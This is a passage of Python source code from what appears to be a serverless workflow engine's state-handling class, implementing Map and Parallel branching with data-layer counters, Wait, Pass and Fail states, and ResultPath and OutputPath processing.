self._logger.debug("\t mapInfo_key:" + mapInfo_key)
#self._logger.debug("\t mapInfo:" + json.dumps(mapInfo))
self._logger.debug("\t workflow_instance_metadata_storage_key: " + workflow_instance_metadata_storage_key)
#self._logger.debug("\t metadata " + json.dumps(metadata))
self._logger.debug("\t total_branch_count:" + str(total_branch_count))
self._logger.debug("\t branch_out_keys:" + ",".join(branch_out_keys))
# create counter for Map equivalent Parallel state
assert py3utils.is_string(CounterName)
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded put key: " + str(workflow_instance_metadata_storage_key))
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
#assert py3utils.is_string(workflow_instance_outputkeys_set_key)
# sapi.createSet(workflow_instance_outputkeys_set_key) # obsolete statement
# Now provide each branch with its own input
#branches = self.parsedfunctionstateinfo["Branches"]
branch = self.parsedfunctionstateinfo["Iterator"] # this is just onee set
#for branch in branches:
# launch a branch for each input element
startat = str(branch["StartAt"])
for i in range(len(function_input)):
sapi.add_dynamic_next(startat, function_input[i]) # Alias for add_workflow_next(self, next, value)
sapi.put(name_prefix + "_" + "mapStateInputValue", str(function_input[i]))
sapi.put(name_prefix + "_" + "mapStateInputIndex", str(i))
#self._mapStateInfo["mapStateInputValue"] = str(function_input[i])
#self._mapStateInfo["mapStateInputIndex"] = str(i)
self._logger.debug("\t Map State StartAt:" + startat)
self._logger.debug("\t Map State input:" + str(function_input[i]))
return function_input, metadata
def evaluatePostMap(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
# function is triggered by post-commit hook with metadata containing information about state results in buckets.
# It collects these results and returns metadata and post_map_output_results
#self._logger.debug("[StateUtils] evaluatePostMap: ")
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t function_input: " + str(function_input))
action = metadata["__state_action"]
assert action == "post_map_processing"
#counterValue = metadata["CounterValue"]
counterValue = function_input["CounterValue"]
state_counter = 0
if "state_counter" in metadata:
state_counter = metadata["state_counter"]
#self._logger.debug("[StateUtils] evaluatePostMap, metadata[state_counter]: " + str(metadata["state_counter"]))
self._logger.debug("\t metadata:" + json.dumps(metadata))
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded get: " + str(full_metadata_encoded))
full_metadata = json.loads(full_metadata_encoded)
full_metadata["state_counter"] = state_counter
#mapInfoKey = key + "_" + self.functionstatename + "_map_info"
mapInfoKey = self.functionstatename + "_" + key + "_map_info"
mapInfo = full_metadata[mapInfoKey]
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
self._logger.debug("\t branchOutputKeysSet: " + str(branchOutputKeysSet))
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
k_list = mapInfo["k_list"]
self._logger.debug("\t action: " + action)
self._logger.debug("\t counterValue:" + str(counterValue))
#self._logger.debug("\t WorkflowInstanceMetadataStorageKey:" + metadata["WorkflowInstanceMetadataStorageKey"])
#self._logger.debug("\t full_metadata:" + full_metadata_encoded)
self._logger.debug("\t mapInfoKey: " + mapInfoKey)
#self._logger.debug("\t mapInfo:" + json.dumps(mapInfo))
self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
self._logger.debug("\t branchOutputKeysSet:" + str(branchOutputKeysSet))
self._logger.debug("\t k_list:" + str(k_list))
NumBranchesFinished = abs(counterValue)
self._logger.debug("\t NumBranchesFinished:" + str(NumBranchesFinished))
do_cleanup = False
if k_list[-1] == NumBranchesFinished:
do_cleanup = True
self._logger.debug("\t do_cleanup:" + str(do_cleanup))
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
assert py3utils.is_string(counterName)
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
post_map_output_values = []
self._logger.debug("\t mapInfo_BranchOutputKeys:" + str(mapInfo["BranchOutputKeys"]))
self._logger.debug("\t mapInfo_BranchOutputKeys length: " + str(len(mapInfo["BranchOutputKeys"])))
for outputkey in mapInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet: # mapInfo["BranchOutputKeys"]:
self._logger.debug("\t BranchOutputKey:" + outputkey)
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
self._logger.debug("\t branchOutput(type):" + str(type(branchOutput)))
self._logger.debug("\t branchOutput:" + branchOutput)
self._logger.debug("\t branchOutput_decoded(type):" + str(type(branchOutput_decoded)))
self._logger.debug("\t branchOutput_decoded:" + str(branchOutput_decoded))
post_map_output_values = post_map_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
self._logger.debug("\t cleaned output key:" + outputkey)
else:
post_map_output_values = post_map_output_values + [None]
self._logger.debug("\t this_BranchOutputKeys is not contained: " + str(outputkey))
self._logger.debug("\t post_map_output_values:" + str(post_map_output_values))
while (sapi.get(name_prefix + "_" + "mapStatePartialResult")) == "":
time.sleep(0.1) # wait until value is available
mapStatePartialResult = ast.literal_eval(sapi.get(name_prefix + "_" + "mapStatePartialResult"))
#mapStatePartialResult = ast.literal_eval(self._mapStateInfo["mapStatePartialResult"])
mapStatePartialResult += post_map_output_values
sapi.put(name_prefix + "_" + "mapStatePartialResult", str(mapStatePartialResult))
#self._mapStateInfo["mapStatePartialResult"] = str(mapStatePartialResult)
# now apply ResultPath and OutputPath
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if ast.literal_eval(sapi.get(name_prefix + "_" + "mapInputCount")) == len(mapStatePartialResult):
# if ast.literal_eval(self._mapStateInfo["mapInputCount"]) == len(mapStatePartialResult):
# we are ready to publish but need to honour ResultPath and OutputPath
res_raw = ast.literal_eval(sapi.get(name_prefix + "_" +"mapStatePartialResult"))
#res_raw = ast.literal_eval(self._mapStateInfo["mapStatePartialResult"])
# remove unwanted keys from input before publishing
function_input = {}
function_input_post_result = self.applyResultPath(function_input, res_raw)
function_input_post_output = self.applyResultPath(function_input_post_result, function_input_post_result)
if "Next" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["Next"]:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], function_input_post_output )
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", function_input_post_output)
sapi.delete(name_prefix + "_" + "mapInputCount")
sapi.delete(name_prefix + "_" + "mapStateInputIndex")
sapi.delete(name_prefix + "_" + "mapStateInputValue")
sapi.delete(name_prefix + "_" + "mapStatePartialResult")
sapi.delete(name_prefix + "_" + "tobeProcessedlater")
post_map_output_values = function_input_post_output
return post_map_output_values, full_metadata
def evaluateParallelState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
total_branch_count = self.parsedfunctionstateinfo["BranchCount"]
assert total_branch_count == len(self.parsedfunctionstateinfo["Branches"])
klist = [total_branch_count]
# dynamic values
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = name_prefix + "_branch_" + str(i+1)
branch_out_keys.append(branch_out_key)
counter_metadata = {}
counter_metadata["__state_action"] = "post_parallel_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
CounterName = name_prefix + "_counter"
counter_metadata_key_name = CounterName + "_metadata"
workflow_instance_outputkeys_set_key = name_prefix + "_outputkeys_set"
parallelInfo = {}
parallelInfo["CounterName"] = CounterName
parallelInfo["BranchOutputKeys"] = branch_out_keys
parallelInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
parallelInfo["Klist"] = klist
parallelInfo["TotalBranches"] = total_branch_count
parallelInfo["ExecutionId"] = key
parallelInfo["FunctionTopic"] = self.functiontopic
parallelInfo["Endpoint"] = self._internal_endpoint
parallelInfo_key = self.functionstatename + "_" + key + "_parallel_info"
metadata[parallelInfo_key] = parallelInfo
#self._logger.debug("[StateUtils] evaluateParallelState: ")
#self._logger.debug("\t CounterName:" + CounterName)
#self._logger.debug("\t CounterMetadata: " + json.dumps(counter_metadata))
#self._logger.debug("\t parallelInfo_key:" + parallelInfo_key)
#self._logger.debug("\t parallelInfo:" + json.dumps(parallelInfo))
#self._logger.debug("\t total_branch_count:" + str(total_branch_count))
#self._logger.debug("\t branch_out_keys:" + ",".join(branch_out_keys))
assert py3utils.is_string(CounterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
assert py3utils.is_string(workflow_instance_outputkeys_set_key)
sapi.createSet(workflow_instance_outputkeys_set_key)
branches = self.parsedfunctionstateinfo["Branches"]
for branch in branches:
startat = str(branch["StartAt"])
sapi.add_dynamic_next(startat, function_input)
#self._logger.debug("\t Branch StartAt:" + startat)
#self._logger.debug("\t Branch input:" + str(function_input))
return function_input, metadata
def processBranchTerminalState(self, key, value_output, metadata, sapi):
if 'End' not in self.parsedfunctionstateinfo:
return
if self.parsedfunctionstateinfo["End"] and "ParentParallelInfo" in self.parsedfunctionstateinfo:
parentParallelInfo = self.parsedfunctionstateinfo["ParentParallelInfo"]
parallelName = parentParallelInfo["Name"]
branchCounter = parentParallelInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentParallelInfo:" + json.dumps(parentParallelInfo))
#self._logger.debug("\t parallelName:" + parallelName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
parallelInfoKey = parallelName + "_" + key + "_parallel_info"
#self._logger.debug("\t parallelInfoKey:" + parallelInfoKey)
if parallelInfoKey in metadata:
parallelInfo = metadata[parallelInfoKey]
counterName = str(parallelInfo["CounterName"])
branchOutputKeys = parallelInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[branchCounter-1])
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
#self._logger.debug("\t branchOutputKey:" + branchOutputKey)
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find ParallelInfo")
raise Exception("processBranchTerminalState Unable to find ParallelInfo")
if self.parsedfunctionstateinfo["End"] and "ParentMapInfo" in self.parsedfunctionstateinfo:
parentMapInfo = self.parsedfunctionstateinfo["ParentMapInfo"]
#self._logger.debug("[StateUtils] processBranchTerminalState:parentMapInfo: " + str(parentMapInfo))
mapName = parentMapInfo["Name"]
#self._logger.debug("[StateUtils] processBranchTerminalState:mapName: " + str(mapName))
mapInfoKey = mapName + "_" + key + "_map_info"
#self._logger.debug("[StateUtils] processBranchTerminalState:mapInfoKey: " + str(mapInfoKey))
branchCounter = parentMapInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentMapInfo:" + json.dumps(parentMapInfo))
#self._logger.debug("\t mapName:" + mapName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
if mapInfoKey in metadata:
mapInfo = metadata[mapInfoKey]
rest = metadata["__function_execution_id"].split("_")[1:]
for codes in rest: # find marker for map state and use it to calculate current index
if "-M" in codes:
index = rest.index(codes)
current_index = int(rest[index].split("-M")[0])
self._logger.debug("[StateUtils] current_index: " + str(current_index))
if mapInfo["MaxConcurrency"] != 0:
current_index = current_index % int(mapInfo["MaxConcurrency"])
counterName = str(mapInfo["CounterName"])
branchOutputKeys = mapInfo["BranchOutputKeys"]
#branchOutputKey = str(branchOutputKeys[branchCounter-1])
branchOutputKey = str(branchOutputKeys[current_index])
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
self._logger.debug("\t branchOutputKey:" + branchOutputKey)
self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find MapInfo")
raise Exception("processBranchTerminalState Unable to find MapInfo")
def evaluatePostParallel(self, function_input, key, metadata, sapi):
#self._logger.debug("[StateUtils] evaluatePostParallel: ")
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t function_input: " + str(function_input))
action = metadata["__state_action"]
assert action == "post_parallel_processing"
counterValue = function_input["CounterValue"]
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
# self._logger.debug("[StateUtils] full_metadata_encoded: " + str(full_metadata_encoded))
full_metadata = json.loads(full_metadata_encoded)
parallelInfoKey = self.functionstatename + "_" + key + "_parallel_info"
parallelInfo = full_metadata[parallelInfoKey]
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
k_list = parallelInfo["Klist"]
#self._logger.debug("\t action: " + action)
#self._logger.debug("\t counterValue:" + str(counterValue))
#self._logger.debug("\t WorkflowInstanceMetadataStorageKey:" + metadata["WorkflowInstanceMetadataStorageKey"])
#self._logger.debug("\t full_metadata:" + full_metadata_encoded)
#self._logger.debug("\t parallelInfoKey:" + parallelInfoKey)
#self._logger.debug("\t parallelInfo:" + json.dumps(parallelInfo))
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
#self._logger.debug("\t branchOutputKeysSet:" + str(branchOutputKeysSet))
#self._logger.debug("\t k_list:" + str(k_list))
NumBranchesFinished = abs(counterValue)
#self._logger.debug("\t NumBranchesFinished:" + str(NumBranchesFinished))
do_cleanup = False
if k_list[-1] == NumBranchesFinished:
do_cleanup = True
#self._logger.debug("\t do_cleanup:" + str(do_cleanup))
counterName = str(parallelInfo["CounterName"])
assert py3utils.is_string(counterName)
counter_metadata_key_name = counterName + "_metadata"
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
#self._logger.debug("\t deleted Counter: " + counterName)
sapi.delete(workflow_instance_metadata_storage_key)
post_parallel_output_values = []
#self._logger.debug("\t parallelInfo_BranchOutputKeys:" + str(parallelInfo["BranchOutputKeys"]))
for outputkey in parallelInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet:
#self._logger.debug("\t BranchOutputKey:" + outputkey)
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
#self._logger.debug("\t branchOutput(type):" + str(type(branchOutput)))
#self._logger.debug("\t branchOutput:" + branchOutput)
#self._logger.debug("\t branchOutput_decoded(type):" + str(type(branchOutput_decoded)))
#self._logger.debug("\t branchOutput_decoded:" + str(branchOutput_decoded))
post_parallel_output_values = post_parallel_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
#self._logger.debug("\t cleaned output key:" + outputkey)
else:
post_parallel_output_values = post_parallel_output_values + [None]
#self._logger.debug("\t post_parallel_output_values:" + str(post_parallel_output_values))
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if "Next" in self.parsedfunctionstateinfo:
#self._logger.debug("\t add_dynamic_next:" + self.parsedfunctionstateinfo["Next"])
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], post_parallel_output_values)
#ToDo: need to check if Parallel state itself is terminal state
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
#self._logger.debug("\t add_dynamic_next:" + self.parsedfunctionstateinfo["Next"])
sapi.add_dynamic_next("end", post_parallel_output_values)
return function_input, full_metadata
def evaluateNonTaskState(self, function_input, key, metadata, sapi):
# 3. Evaluate Non Task states
#self._logger.debug("[StateUtils] NonTask state type: " + str(self.functionstatetype))
#self._logger.debug("[StateUtils] Welcome to evaluateNonTaskState! Current key:" + str(key))
function_output = None
if self.functionstatetype == StateUtils.choiceStateType:
#self._logger.debug("[StateUtils] Choice state info:" + str(self.functionstateinfo))
self.evaluateChoiceConditions(function_input) # this sets chosen Next state
#self._logger.debug("[StateUtils] Choice state Next:" + str(self.choiceNext))
function_output = function_input # output of the Choice state
elif self.functionstatetype == StateUtils.waitStateType:
#self._logger.debug("[StateUtils] Wait state info:" + str(self.functionstateinfo))
function_output = function_input
if "Seconds" in list(json.loads(self.functionstateinfo).keys()):
wait_state_seconds = json.loads(self.functionstateinfo)['Seconds']
#self._logger.debug("[StateUtils] Wait state seconds:" + str(wait_state_seconds))
time.sleep(float(wait_state_seconds))
elif "SecondsPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_secondspath = json.loads(self.functionstateinfo)['SecondsPath']
#self._logger.debug("[StateUtils] Wait state secondspath:" + str(wait_state_secondspath))
wait_state_secondspath_data = [match.value for match in parse(wait_state_secondspath).find(function_input)]
if wait_state_secondspath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamppath does not match: " + str(wait_state_secondspath))
raise Exception("Wait state timestamppath does not match")
#self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_secondspath_data[0]))
time.sleep(float(wait_state_secondspath_data[0]))
elif "Timestamp" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamp = json.loads(self.functionstateinfo)['Timestamp']
#self._logger.debug("[StateUtils] Wait state timestamp:" + str(wait_state_timestamp))
target_time = datetime.strptime(str(wait_state_timestamp), "%Y-%m-%dT%H:%M:%SZ")
current_time = datetime.utcnow()
#self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
#self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamp))
elif "TimestampPath" in list(json.loads(self.functionstateinfo).keys()):
wait_state_timestamppath = json.loads(self.functionstateinfo)['TimestampPath']
self._logger.debug("[StateUtils] Wait state timestamppath:" + str(wait_state_timestamppath))
# need to communicate with datalayer for definition of trigger for hibernating/resuming task
wait_state_timestamppath_data = [match.value for match in parse(wait_state_timestamppath).find(function_input)]
if wait_state_timestamppath_data == []:
#self._logger.exception("[StateUtils] Wait state timestamp_path does not match: " + str(wait_state_timestamppath))
raise Exception("Wait state timestamp_path does not match")
self._logger.debug("[StateUtils] Wait state timestamppath data parsed:" + str(wait_state_timestamppath_data[0]))
target_time = datetime.strptime(str(wait_state_timestamppath_data[0]), "%Y-%m-%dT%H:%M:%SZ")
self._logger.debug("[StateUtils] Wait state timestamp data" + str(target_time))
current_time = datetime.utcnow()
self._logger.debug("[StateUtils] Wait state timestamp difference" + str(current_time) + str(target_time))
remaining = (target_time - current_time).total_seconds()
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining))
remaining_time = float(remaining)
self._logger.debug("[StateUtils] Wait state timestamp remaining total_seconds:" + str(remaining_time))
if remaining_time > 0:
time.sleep(remaining_time)
else:
self._logger.error("[StateUtils] Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
raise Exception("Wait state timestamp target lies in the past!" + str(wait_state_timestamppath_data[0]))
else:
#self._logger.exception("[StateUtils] Wait state: Missing required field")
raise Exception("Wait state: Missing required field")
elif self.functionstatetype == StateUtils.passStateType:
self._logger.debug("[StateUtils] Pass state handling, received value:" + str(function_input))
function_output = function_input
if "Result" in self.functionstateinfo:
pass_state_result = json.loads(self.functionstateinfo)['Result']
self._logger.debug("[StateUtils] Pass state result:" + str(pass_state_result))# self.functionstateinfo['Result']))
function_output = pass_state_result
elif self.functionstatetype == StateUtils.succeedStateType:
function_output = function_input
elif self.functionstatetype == StateUtils.failStateType:
self._logger.debug("[StateUtils] Fail state handling, received value:" + str(function_input))
self._logger.debug("[StateUtils] Fail state handling, received metadata:" + str(metadata))
if "Cause" in self.functionstateinfo:
fail_state_cause = json.loads(self.functionstateinfo)['Cause']
self._logger.debug("[StateUtils] Fail state cause info:" + str(fail_state_cause))
if "Error" in self.functionstateinfo:
error_state_error = json.loads(self.functionstateinfo)['Error']
self._logger.debug("[StateUtils] Fail state error info:" + str(error_state_error))
function_output = function_input
elif self.functionstatetype == StateUtils.parallelStateType:
self._logger.debug("[StateUtils] Parallel state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Parallel state handling metadata: " + str(metadata))
self._logger.debug("[StateUtils] Parallel state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_parallel_processing":
function_output, metadata = self.evaluateParallelState(function_input, key, metadata, sapi)
else:
if metadata["__state_action"] == "post_parallel_processing":
function_output, metadata = self.evaluatePostParallel(function_input, key, metadata, sapi)
elif self.functionstatetype == StateUtils.mapStateType:
name_prefix = self.functiontopic + "_" + key
self._logger.debug("[StateUtils] Map state handling function_input: " + str(function_input))
self._logger.debug("[StateUtils] Map state handling metadata: " + str(metadata))
if "MaxConcurrency" in self.parsedfunctionstateinfo.keys():
maxConcurrency = int(self.parsedfunctionstateinfo["MaxConcurrency"])
else:
maxConcurrency = 0
self._logger.debug("[StateUtils] Map state maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] Map state handling")
if "__state_action" not in metadata or metadata["__state_action"] != "post_map_processing":
# here we start the iteration process on a first batch
if maxConcurrency != 0:
tobeProcessednow = function_input[:maxConcurrency] # take the first maxConcurrency elements
tobeProcessedlater = function_input[maxConcurrency:] # keep the remaining elements for later
else:
tobeProcessednow = function_input
tobeProcessedlater = []
self._logger.debug("[StateUtils] Map state function_input split:" + str(tobeProcessednow) + " " + str(tobeProcessedlater))
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater)) # store elements to be processed on DL
sapi.put(name_prefix + "_" + "mapStatePartialResult", "[]") # initialise the collector variable
sapi.put(name_prefix + "_" + "mapInputCount", str(len(function_input)))
"""
metadata["tobeProcessedlater"] = str(tobeProcessedlater) # store elements to be processed on DL
metadata["mapStatePartialResult"] = "[]" # initialise the collector variable
metadata["mapInputCount"] = str(len(function_input))
"""
function_output, metadata = self.evaluateMapState(tobeProcessednow, key, metadata, sapi)
elif metadata["__state_action"] == "post_map_processing":
tobeProcessedlater = ast.literal_eval(sapi.get(name_prefix + "_" + "tobeProcessedlater")) # get all elements that have not yet been processed
#tobeProcessedlater = ast.literal_eval(self._mapStateInfo["tobeProcessedlater"]) # get all elements that have not yet been processed
self._logger.debug("[StateUtils] Map state post_map processing input:" + str(tobeProcessedlater))
# we need to decide at this point if there is a need for more batches. if so:
if len(tobeProcessedlater) > 0: # we need to start another batch
function_output, metadata2 = self.evaluatePostMap(function_input, key, metadata, sapi) # take care not to overwrite metadata
function_output, metadata = self.evaluateMapState(tobeProcessedlater[:maxConcurrency], key, metadata, sapi) # start a new batch
sapi.put(name_prefix + "_" + "tobeProcessedlater", str(tobeProcessedlater[maxConcurrency:])) # store remaining elements to be processed on DL
#self._mapStateInfo["tobeProcessedlater"] = str(tobeProcessedlater[maxConcurrency:]) # store remaining elements to be processed on DL
else: # no more batches required. we are at the iteration end, publish the final result
self._logger.debug("[StateUtils] Map state input final stage: " + str(function_input))
function_output, metadata = self.evaluatePostMap(function_input, key, metadata, sapi)
else:
raise Exception("Unknow action type in map state")
else:
raise Exception("Unknown state type")
return function_output, metadata
def applyResultPath(self, raw_state_input, function_output):
#4. Apply ResultPath, if available and if not 'Parallel' state
# if ResultPath:
# if ResultPath == '$' (this is the default value)
# raw_state_input_midway = function_output
# if ResultPath == 'null'
# raw_state_input_midway = raw_state_input
# if ResultPath == some variable name
# raw_state_input[some variable name] = function_output
# raw_state_input_midway = raw_state_input
# else:
# raw_state_input_midway = function_output
#
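# Hedged sketch (values are hypothetical, and it assumes the jsonpath tokenizer splits
# "$.taskresult" into ['$', 'taskresult']): with self.result_path_dict set to
# {"ResultPath": "$.taskresult"}, a raw_state_input of {"a": 1} and a function_output of 42,
# process_result_path builds {"taskresult": 42} from the path tokens and merges it with the
# input, yielding {"taskresult": 42, "a": 1}. Without a ResultPath entry the function output
# simply replaces the state input.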
raw_state_input_midway = raw_state_input
#self._logger.debug("Reached applyResultPath: " + str(self.result_path_dict))
try:
if self.result_path_dict and 'ResultPath' in self.result_path_dict:
raw_state_input_midway = self.process_result_path(self.result_path_dict, raw_state_input, function_output)
else:
raw_state_input_midway = function_output
return raw_state_input_midway
except Exception as exc:
raise Exception("Result path processing exception: " + str(exc))
#self._logger.exception("Result path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def applyOutputPath(self, raw_state_input_midway):
#5. Apply OutputPath, if available
# if OutputPath:
# if OutputPath == '$' (this is the default value)
# raw_state_output = raw_state_input_midway
# if OutputPath = 'null'
# raw_state_output = {}
# if OutputPath == some existing variable in 'raw_state_input_midway'
# raw_state_output = raw_state_input_midway[some existing variable]
# if OutputPath == some non-existing variable
# throw exception
# else:
# raw_state_output = raw_state_input_midway
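# Hedged sketch (values are hypothetical): with self.output_path_dict set to
# {"OutputPath": "$.payload"} and raw_state_input_midway equal to
# {"payload": {"x": 1}, "meta": 2}, process_output_path selects the matching top-level key
# and returns {"x": 1}; an OutputPath that matches nothing raises the "invalid path"
# exception instead.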
raw_state_output = raw_state_input_midway
try:
if self.output_path_dict and 'OutputPath' in self.output_path_dict:
raw_state_output = self.process_output_path(self.output_path_dict, raw_state_input_midway)
else:
raw_state_output = raw_state_input_midway
return raw_state_output
except Exception as exc:
raise Exception("Output path processing exception: " + str(exc))
#self._logger.exception("Output path processing exception")
#sys.stdout.flush()
#self._logger.exception(exc)
#raise
def parse_function_state_info(self):
if self.functionstatetype == StateUtils.defaultStateType:
#self._logger.debug("Task_SAND state parsing. Not parsing further")
return
else:
self.parsedfunctionstateinfo = json.loads(self.functionstateinfo)
